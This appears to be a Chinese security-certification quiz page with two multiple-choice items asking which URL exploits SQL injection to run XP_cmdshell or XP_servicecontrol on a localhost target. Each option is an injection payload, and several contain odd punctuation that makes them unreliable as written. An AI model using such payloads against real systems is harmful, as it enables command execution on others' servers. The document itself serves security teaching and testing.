以下哪条命令能利用“SQL注入”漏洞动用XP_cmdshell存储过程,获得某个子目的清单?()

A:http://localhost/script?’:EXEC+master..XP_cmdshell+’dir’:-- B:http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’:-- C:http://localhost/script?0’:EXEC+master..XP_cmdshell+’dir’:-- D:http://localhost/script?1’:EXEC+master..XP_cmdshell+’dir’--

以下哪条命令能利用“SQL”漏洞动用XP_cmdshell存储过程,启动或停止某项服务?()

A:http://localhost/script?’:EXEC+master..XP_servicecontrol+’start’,+’Server’;- B:http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-- C:http://localhost/script?1’:EXEC+master..XP_servicecontrol+’start’,+’Server’;-- D:http://localhost/script?0’:EXEC+master..XP_servicecontrol+’start’,+’Server’--

微信扫码获取答案解析
下载APP查看答案解析